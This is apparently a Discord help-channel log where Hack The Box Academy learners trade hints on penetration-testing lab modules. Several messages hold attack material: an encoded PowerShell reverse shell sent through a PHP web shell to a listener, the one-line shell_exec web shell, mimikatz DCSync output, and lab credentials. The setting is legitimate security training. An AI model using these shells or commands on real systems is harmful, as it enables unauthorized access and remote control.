For instance, I am doing the SQLMap Essentials and the module is not arranged properly ... for some reason I am learning how to build attacks before learning how to enumerate databases using the tool.

@iron plaza my fear is with the modules that htb may neglect to mention other sources that would be better and more exaustive then htb would be able to do because they are conflicted with maintaining your time in their site

They don't need to maintain your time on the site as they are not selling ads, plus you are already paying them. But to address your point, this is where you need to build your ability to proactively seek out other resources and information on your own

Also as far as other resources: there's generally a link or two for further discovery. And Google is one of the best resources. Another is ippsec

@fathom pendant Yeh good to know, it's just a another reminder cyber security is big discipline that requires alot of dedication to understand let alone master, no resources would ever be able to call itself the most comprehensive in any area with how fast this field evolves

https://tenor.com/view/adam-levine-embarrassed-the-voice-shy-shame-gif-4355252

Hello! Sorry, I'm getting trouble with a question, I'm in the module Intro to Windows Command Line in the section of Environment Variables and I'm really sure that the answer to the question is "System Environment Variable", I've been trying all the combinations with this kind of concept like "system", "system variable", "global", "global variable, global variable scope" and I don't know if is an error of the question or just my answer is wrong 😭

Help pls!!🙏

What's the question?

You kinda threw info but didn't ask the question

The question is

What variable scope allows for universal access?

And the hint is:

We want it to be accessible around the world of our operating system

Should be "global variable"
"Global Variable"

Sometimes some modules are case sensitive

Or Global

I've already tried that but it doesn't work, could be an error of the question?

Actually thats the answer (I'm really sure) but it looks like it isn't

Weird

https://tenor.com/view/neil-patrick-harris-upset-disappointed-sad-gif-13711197

Yeah...no... It uh...it should be "Global"

No quotes or anything

But I just checked

Weird if it's not accepting your answer

... OMG ||Yeah it is!
just Global||,
Thank you so much really!

Currently stuck on the PtT from Linux section I cant seem to find an answer to "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." - Anyone have any tips?

If you're still stuck, (a) don't overthink it, (b) using the hint may well come in handy, and (c) use the cheat-sheet. If still-still stuck, feel free to DM me.

@west canopy
May you can take a look here when you get a chance? What am I doing wrong? Actually it is a step by step guide in the module. Why is the answer not accepted?

#modules message

I'm having a hard time on the SQL part of the Attacking Common Services. I can login using the given creds using impacket but even after enumerating EVERYTHING that I have the privilege for I cant seem to find ||the hash for the mssqlsvc user ||

Can someone help me pleeeease 🙂

|| Responder || is your friend

hi for "AD Enumeration & Attacks - Skills Assessment Part I" question3: Crack the account's password. Submit the cleartext value.

I have uploaded powerview and mimikatz, but when i ran it, nothings happens.

i have done this in my rev shell and also in the webshell. any hints on this?

SOLVED: I used another tool instead, not sure why mimikatz is not working

No I solved it. Thanks for the offer.

The Live Engagement Sections! Do you have any hints? for that sections
Shells & Payloads module

I tried to upload the shell but it’s still doesn’t work

Spawning the target what does it mean

The targets are usually (most of them) offline, spawning will spawn the target so you can access it

@autumn pilot will you please elaborate it cause I am not that good at English

means that you are powering on the target

Powering means attacking right

No, you should start the target server
spawning means start the target

Now got it 👍 thanks @acoustic owl

@autumn pilot thanks

hello everyone, i need help with one small thing, have a php file in the server, and i need using curl get a reverse shell, used the revshell. Im doing this curl http://10.129.104.61/1php.php?cmd=cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCIxMC4xMC4xNS4xNTEiLDEyMzQpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiAgPSAkc2VuZGJhY2sgKyAiUFMgIiArIChwd2QpLlBhdGggKyAiPiAiOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgp, and in there is my powershell in base64 to get a shell, but its not doing nothing, what is missing? PS: i have nc listener ready to get the connection. Thanks for your attention.

I want to identify the services running on the target box with nmap but I keep getting:

Failed to resolve "144.126.228.127:32165".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.03 seconds

I'm on a VM and I've just connected to HTB VPN.
I can render "144.126.228.127:32165" on my browser but can't nmap it?
What am I missing here?

you can not put ip:port , if you want a specific port put nmap -p 32165 144.126.228.127

hmm trying it now

I get something similar:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 12:55 WEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.33 seconds```

try -Pn etc

oh wait it's going somewhere now with the -Pn option

You don't have to nmap that target

weird that I tried using it a while back but it was stuck

wdym? how do you identify the available services?

by simply visiting the target

the page does render you're right ... thought I had to nmap it though

how to know which is the right epochtime??? and is this script usable?

So you can tell that wordpress powers it whenever you visit that page ... if I run 'whatweb 144.126.228.127:32165' I can tell it's running wordpress 5.6.1. The only exploit I found on wpscan.com, without a fix, was an authenticated Blind SSRF via DNS Rebinding. I can't find this exploit on metasploit and if I search for wordpress within metasploit, I get a few dozen of them. Do I have to try them all?

Just finished the Into to Assembly Language. Annoying but very satisfying.

do I even have to use metasploit and/or look for wordpress exploits or nah?

I mean you technically never have to use metasploit but its way easier if you do for some stuff

It could also be that wordpress is not the thing that gives you a foothold here.

what's confusing me right now is that I'm trying stuff and that same stuff doesn't get me anywhere

Thats normal

What module are you working on ?

yeah wordpress doesn't seem to be it ... I'm trying a simple backup exploit but I'm only getting ```[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

I think I'm supposed to get a file or something not sure

https://academy.hackthebox.com/module/77/section/843

Do you need to do it that way or do you just need to get a reverseshell ?

I'm not even sure haha

I need a flag

that's all I know

That wasn't addressed at you xD

my bad

Lets take this to dm I will start the service and we can talk about it

Just finished attacking web applications with ffuf, if anyone needs help feel free to dm me 🙂

hello, I was trying to register for the email every time it is the email does not match because I’m using so it ends like this @icloud.com can someone help me

What email? @latent crane

Perhaps if you use "Hide my email adress" which is a option for privacy from apple, try turning that off

What setting is that called

i’m talking about the type of setting

This is what shows me

it says forbidden

403 unauthorised what do I do now?

Can I get some help with a intro to pyton 3 question?

The first iteration.

What is the 3rd most used word on the exercise target website.

Do I not need the parrot terminal?

I talked to a guy that already did, and he told me thar I need to use revshell to have a powershell encoded to use with the php file that already is in the server. The php file have "<?php echo shell_exec($_GET['cmd']);?>"

For more context this is for attacking services easy.

everything is fine now

I was just stupid

but now is everything fine

AFAI remember || a simple php reverse shell || will do the trick just fine.

Do I have to download python 3 onto the hack the box instance?

no

Like using the one that already exists to create another one that will give me a reverse shell ?

you can use python3 to run python 3

In the mate terminal?

In the normal terminal

idk if its mate

Okay I think I got it.

nice 😄

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

• Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.

If you can upload a php just upload a ||php reverse shell||

hello all, anyone facing this hashcat error

not fixable for now.

either use US pwnbox or your own

thanks for letting me know, i will fire up my own virtual machine

I can put the php file using mysql command, and if a try to put something more complex( ; " ' > < ) gives me syntax error

You did, the Attacking services-easy module?

Nevermind Im lost.

@manic magnet can you help me please?

Hey guys can anyone help me with the local file inclusion skills assessment? I’ve managed to get to the admin panel and can read the access log and, supposedly, am able to poison the log with the php webshell used throughout the module but once I send it, the log just seems to freeze up and eventually just crashes and im forced to restart the machine

I’ve tried alternatives too, like doing [“cmd=id”] or just [“id”] but nothing is working

I'm in the Active Directory Enumeration and Attacks module and I'm stuck in the Privileged Access section. I thus far haven't been able to get any of the commands to work. The provided script for BloodHound doesn't work and won't search for any other users in the Local Admin and Execution Rights group. Does anyone have any suggestions on what could be wrong?

The log file uses double quotes. You should not use double quotes in your payload.

I think I’ve used single quotes too but I’ll try it again

I have no clue what I did differently this time but it worked

Thank you

Take a close look at the log file. It uses double quotes. If you use double quotes in your payload, then you are changing the structure. Your payload will be torn apart.

Thank you, im putting that in my notes

Just finished CrackMapExec module, kudos to @acoustic owl for the nudge
If someone is in need, don't hesitate to DM me.

where are you lost ?

Yeah I did

I have the target spawned and I put the code in that it tells me to but it says theres an error. Hold on.

Can you dm me the section you are stuck on ?

Can someone nudge me on the Footprinting easy lab? I havent found anything yet sadly.

What switches are you using with your nmap scan?

I see where the problem is. I did not use mysql I used another method. There is more than one way

-sV -sC -A. Also tried running some --scripts against each service as well.

Have you tried disabling host discovery?

yeah but the results seem to be the same

You're running it with the other switches and still not getting any results?

I mean, I have results. I guess im just not sure what I should be looking at.

Based on what is open, I assume I need to try and log into FTP or SSH but nothing is pointing to how

Hello I am stuck on the NMAP module --> Firewall and IDS/IPS Evasion Hard Lab,

I found ||the hidden port 50000|| but its always filtered,

I tried
||to access it from the same subnet -> sudo nmap -p 50000 -sS -sV -Pn --disable-arp-ping -S 10.129.2.40 10.129.2.47 -e eth1|| But without -e it says that it doesn't know which network interface to use, i tried every network interface (tun0, eth0, eth1) but it says failed to determine route to 10.129.2.47

Can someone help me with the Getting Started module -> Privilege Escalation

I cannot for the life of me find how to solve it

Currently stuck on the PtT from Linux section I cant seem to find an answer to "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." - Anyone have any tips?

The hint says "There is a file containing the credentials of Linux machines in Active Directory." but i can't seem to find an answer

DM me.

There's a specific wget command that you then need to run in order to exploit ftp. I hope that helps.

dm you You need to dm me since I can't dm you in case you still need help

Hey 👋 awesome people of galaxy, quick stupid question. I was working on “Footprinting Lab - Easy”. I was able to solve it with the help of hint provided. Now question is was I supposed to find the password for user ceil? I spent almost half day to figure out credentials but after reading hint and using those credentials, it was easy. So was I supposed to brute force for credentials? Was that part of this lab?

Hi, need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

--source-port 53

You don't need to proxy or anything crazy

Hey folks

Can I get a hint for login brute forcing service login first assignment?

I have bruteforced the life out of SSH and no luck, also looked into forums and it seems like most people are stuck on the first assignment. I can help with the first one if someone can help me with the second.

Is there a different service you can brute?

I didn't even look 😦

I was focused on ssh, I will have a quick peak now

but thing is, it's about my wordlist

idk I'm not home, I'm at workplace starting my shift in an hour ¯_(ツ)_/¯

That's okay, have a nice time

I won't 😄

Is it hard work?

Retail

Right, people stuff

Hello, im currently doing the new Windows Attacks & Defense module. im trying to connect to the domain eagle.local with a given user. Can somebody tell me what im doing wrong? or what the options provided mean

I chose xorg -> username: "eaglebob" password: "givenpassword"

guy's any help with AD- Skill assessment 1 , i have some error with chisel tool

Here is explained how you can connect via RDP
https://academy.hackthebox.com/module/176/section/1754
But you still need the flag /cert-ignore

$ xfreerdp /u:eagle\\bob /p:Slavi123 /v:TARGET_IP /dynamic-resolution /cert-ignore

I just use /size:90%h rather than /dynamic-resolution

Works great on a 2560 monitor

Can you provide me with programming tips?, i am new at programming

Use PowerShell ISE for this one and PowerView again.

So use Powerview for the GroupSID for GPO Management?

Yes, I believe that's right. You can DM me if you're still having trouble with it.

Can you DM me? I dont understand what I am supposed to do with wget.

Unable to get connect.php file to upload successfully...has anyone else run into this and is there some trick to getting it to work for the PHP Web Shells question #2?

M: Attacking Common Services; S: Easy Lab; i got username f**** and based on hints, i am using r**** wordlist and hydra. im using pwnbox but it looks like it will take up to 237 hours to go thru the wordlist. any recommendations?😫

They provide also a password wordlist 😉

Module : Corporate Osint, Q1
I got the wrong coordinates on Google and don't don't any relevant results.
Can anyone help me in stuck

Yeah same problem

Also if it takes to long its probably not the right way to go. Usually its less then 5-2 min of bruteforcing

mostly the easy labs which aren't easy. 😒

I would say thats normal, because some questions are just absurd

TRUE 😂

Not everything but some

let me check

I think it was alright. Some minor stuff but I mean the thing is the questions as I said are sometimes confusing

Heeey. Seems I'm also stuck with "Identifying Filters" section.

It's about

Which of (new-line, &, |) is not blacklisted

I did try other operators from cheat sheet and from previous section, urlencoded. Still no luck. Can you nudge me please?

EDIT: unstuck)

I mean thats why are you are on a learning platform. If you would do them easily everytime, then why would you be here learning it

I mean yeah but like remember that these people do this stuff for months or years.

can someone help with module sqlmap essentials section skills assessment. I can use sqlmap and it says its vulnerable but i get the error "unable to retrieve the database names"

You're on the right track. Skimming thru the "Bypassing Web Application Protections" section really helped me.

do i need to add a ||tamper||?

yup

ill try it thanks!

I just looked it up you are on the right track with that user and wordlist. Just keep trying stuff ^^

ok thanks for the advice! ill just "try harder" 😆

is anyone having difficulties using RDP to connect atm? i am doing the 'LLMNR/NBT-NS Poisoning - from Windows' module from AD enumeration and attacks

i have reset the machine 3-4 times

Some other general tips:
Bruteforcing may lead to being banned or blocked or rejected. This means that sometimes restarting the service helps.
Also sometimes other tools help. Looking through the section might reveal a better tool
Sometimes the tools are to fast and get blocked so playing around with the connect timing is key

(These are general tips as said, not everything might be needed to be successful in this module)

found this when searching for the error

maybe its helps

nope ;-;

able to RDP in

get dced 30 seconds into the box

Because I just was talking about the Attacking Common Services Easy Lab. Anyone here that finished it and wants to talk about it because there are apparently 2 solutions and I want to know the other one (dm me if so 😄)

OK after some looking around I am pretty sure to know both ways now

was anyone able to complete the footprinting easy lab without the hint on the creds? Curios about where they were.

can someone help me with the lasdt question of intro to pyton3'

this thing is starting to piss me off

i just skipped what i had problems with

also, sometimes with SSH i have trouble typing in the terminal if i have alt tabbed

whys this

I did exactly what hack the box told me to do and it won't take any of my answers

||ftp server has the owners name so you can assume that is the user name then password guessing using seclists can get you the access ||

bro anybody can help me reporting a server cus idk how

reporting a module?

Not the place

Using Web Proxies > Burp Intruder
I have the correct setup to enumerate the webpage but when I navigate to the supposed page with the flag through Firefox, it's blank. Where else am I supposed to look for this flag if it's not present on the page?

Also, the training expressly mentioned navigating to the /admin page to make sure it is reachable and no matter where I go or how many times I refresh the target, it is blank.

Thoughts?

Thanks in advance.

hi everyone :)! awesome new windows module!!! I saw that it mentioned esc8 in the description, but don't see it on list of things on the right( i only see esc1). Is this normal?

In the Windows Attacks & Defense module, has anyone been able to RDP to PKI? I tried spawning the lab multiple times, waited for over 30 minutes each time but still can't RDP and PKI doesn't respond to pings

I'm able to perform the attacks though but not able to RDP into it to view the logs

ESC8 is discussed in the skill assessment section

ah great thanks 🙂

i just used the attack in a lab and was eager to learn more about it

wish I could help but I just started the module 😦

Ugh... I think you're right about the service closing out or banning me. Someone pointed out it's not too far into the wordlist and I just needed to reset the service until I got the password. Thanks for your suggestions!

no worries. I finished all the attacks anyway, but I'm curious to try the blue team aspect of this attack 🙂

nice 😄

❤️ htb academy 🙂

Disregard... The options setting for "Exclude HTTP headers" is what got me

Stuck at nmap scanning firewall medium lab. Whom can I DM? Or any clues pls?

What type of nmap scan flag will give version, reminder you may have to be stealthy @fierce pier

I am using --source-port 53 or 80

And -sSU

Decoy method too

None of them working

VERSION

Is the keyword here

yes using dns-nsid too

What is the nmap flag to do a Version scan

nmap -sV

Mhm

Soooo

Have you added that

(also on the right with 53)

Ok trying now

Also the -sS is not needed (-sU part though I believe is)

My only notes for this is the command used lol

AD Enumeration and Attacks finished! What a great and challenging skills assessment. On to the next module!

@fathom pendant thank q very much. Ur tips very useful. I forgot to add -sV and solved it now 😊😊

Guys is it possible to use hashcat in virtual instances to crack offline passwords

And would it be fast??

It's possible, fast? Meh

Can someone confirm if the answer for the module ATTACKING COMMON APPLICATIONS section Attacking Thick Client Applications is right?

The answer I found is not working at all,

public static void Main(string[] args)
{
    string value = " \r\n    ____            __             __     ____                  __   \r\n   / __ \\___  _____/ /_____ ______/ /_   / __ \\_________ ______/ /__ \r\n  / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/  / / / / ___/ __ `/ ___/ / _ \\\r\n / _, _/  __(__  ) /_/ /_/ / /  / /_   / /_/ / /  / /_/ / /__/ /  __/\r\n/_/ |_|\\___/____/\\__/\\__,_/_/   \\__/   \\____/_/   \\__,_/\\___/_/\\___/ \r\n                                                                      \r\n                                                by @HelpDesk 2010\r\n\r\n\t\t\t";
    Console.WriteLine(value);
    Process process = new Process();
    process.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
    process.StartInfo.Arguments = "/c sc.exe stop OracleServiceXE; sc.exe start OracleServiceXE";
    process.StartInfo.UserName = "s.............le";
    process.StartInfo.UseShellExecute = false;
    SecureString secureString = new SecureString();
    string text = "#ora..........s3rV1..........10";
    checked
    {
<SNIP>

Use username:password format

Grav default password
Friends help with two questions in the Windows Attacks & Defense module: 1.Credentials in Object Properties.Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonnie user? 2.Print Spooler & NTLM Relaying.After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?

remove -n WandaCalverton

I don't understanding?

Remove -n in your echo command

did my comment get remove? I cant see it anymore

yes, since it included partially the answer and will be a spoiler to someone who is trying to solve it as well

Oh Okay. Thanks that worked

So should I PM

my problem?

You can solve your problem by simply removing the -n from your code

I did already.. What I was trying to ask was , if I want to post my problem should I OM any of the moderators my problem

you can post your problem here, however, try explaining it rather just pasting the whole stuff

ACTIVE DIRECTORY ENUMERATION & ATTACKS
DCSync
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\syncron
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\syncron' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

Can someone tell me why it fails

do you have the necessary privs?

Do i need admin creds for it or?

you need to have the following privileges Replicating Directory Changes All and Replicating Directory Changes

Ok.Thanks

is that from enum & attacks module dcsync section?

interesting. Thanks for the info, Ill try again and see if I can find it. I did try some brute forcing but only a few wordlists, including the footprinting one they provided.

the footprinting list doesn't have the username inside, had that same problem too. Just assume users are stupid 🙂

Is there a way to stop the academy target machines? I did some work early in the day and want to come back later but see a target life time ticking down. I haven't extended it, so if it goes end of life will I be able to start it back up later?

Have you tried to refresh the page

Yes. Dropped VPN and logged out/in to the Academy site too

Yeah you can start it later again

pretty sure your progress is reset

You can just reset academy targets later on or start a different section

Some modules use the same targets

ACTIVE DIRECTORY ENUMERATION & ATTACKS

I always get when i want to open my Output from SharpHound with BloodHound bad JSON Format

Did anyone have this before

https://github.com/szymex73/bloodhound-convert

Hello Community,

I need some good inputs.

I am preparing for eJPTv2 and was thinking if Hack the box would be good source? If yes, could someone suggest me some machines on Hack the box for eJPTv2 practice?

Yes however this isn't the place to ask #careers-and-certs is better

hi

what we have to do?

i am a new hacker

i know about qb64 programming language

• https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
• you're going to want to change your name #rules #welcome

can we mention in this server?

thanks

What do you mean "mention"

like

@ and then put a friend/man name

Hey guys,
I'm stuck at Password Attacks - Password Reuse / Default Passwords.
I've got the credentials for user sam from previous challenge. I used them to log in to the machine. In user kira's home directory, I found a zip file that I've cracked and got an unrequested HTB flag. I also found her private key but I can't download it with a python server and wget as it says "file not found". I couldn't get kira's password using hydra and resources provided in the module either. Apparently there used to be a hint in the module but it's been removed.
I'd appreciate any hints or nudges on how I should proceed with this challenge.

Yes. But don't do it randomly. Even if your question has been answered by them or they're active

i will not get ban na

Her password is in the mutated password list

@fathom pendant

Don't do this. It's annoying

ok

There is a list that was mentioned in the section which you can use

That's good to know. Is there a way to speed up the cracking ? For sam, I actually followed the advice to remove the top 17k lines :/

I don't think her password is in there but I could be mistaken

the credentials for MySQL don't need to be mutated

The top 17k

i am a Script kiddies hacker

In fact mySQL can be found in some interesting history

Congrats: we really don't care lol

https://tenor.com/view/my-friend-all-toxic-gif-24328072

Classic embed fail

Anyway potato good luck

what cpts

@fathom pendant & @autumn pilot thank you guys, I'll go try that, I sense an incoming facepalm moment ((:

https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist #cpts

i am geting an error

@sweet roost why i have your name

?

Read #rules

Your regular username is not in line with rules

clear

i am getting problem to loging ,y HTB

remove ,y

I always get BAD JSON FORMAT when i want to open my Output from SharpHound with BloodHound

I tried bloodhound-convert

But it didnt work

Has anyone did the Windows Attacks & Defense? Do the module show and make you do the attacks or only how to defend against them?

Probably attack side not sure how they'd lab the defense unless they have 2 machines for sections (attack/defense)

The module shows both. You perform an attack and then you examine this attack. The module shows how to detect an attack and how to defend against it.

@sweet roost don't randomly dm me

can anyone explain roles system??

Thank you a lot! That could be added to the question 🙂

can anyone explain roles system as well as suggest first path for me??

I can suggest a first path. Start with Information Security Foundations.

Oh thank you so much , can u explain roles too?

Nice

The roles are tied to http://app.hackthebox.com #welcome explains it

Oh i see!! thanks for help sorry for inconvenience

god the DNS section in footprinting really jumps into things

Did you maybe mean the 'job roles', in the academy?

No no i meant discord account roles

Ah, okay

are there anyone completed busqueda right now ??????????????????

ACTIVE DIRECTORY ENUMERATION & ATTACKS
Module Privileged Access
What other user in the domain has CanPSRemote rights to a host?
MATCH
Ive tried to look in BloodHound for the User with Command:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2
It just shows one User forend its still wrong

Why?

Verify your HTB account by following directions in #welcome there is a #boxes channel

Nmap labs are pain.